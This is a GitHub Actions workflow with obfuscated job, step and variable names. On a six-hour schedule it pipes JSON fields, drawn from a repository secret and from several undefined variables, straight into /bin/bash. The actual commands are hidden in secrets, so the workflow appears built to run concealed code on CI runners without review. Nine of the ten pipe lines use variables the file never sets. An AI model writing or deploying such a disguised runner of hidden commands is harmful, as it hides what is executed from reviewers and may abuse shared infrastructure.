name: meiruren4617

on:
  workflow_dispatch:
  schedule:
    - cron: '43 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: meiruren4617
        env:
          b15115: ${{ secrets.b15115 }}
        run: |
          echo $b15115 | jq -r .wwtw7 | /bin/bash
          echo $o1299 | jq -r .p3 | /bin/bash
          echo $s65 | jq -r .qmbov9337 | /bin/bash
          echo $tw8240 | jq -r .sdx6655 | /bin/bash
          echo $u4443 | jq -r .aa213 | /bin/bash
          echo $usq5237 | jq -r .hsntp96265 | /bin/bash
          echo $rr84 | jq -r .ctgui3543 | /bin/bash
          echo $jb381 | jq -r .w913 | /bin/bash
          echo $wnj542 | jq -r .yyj4 | /bin/bash
          echo $l6 | jq -r .abezd4303 | /bin/bash

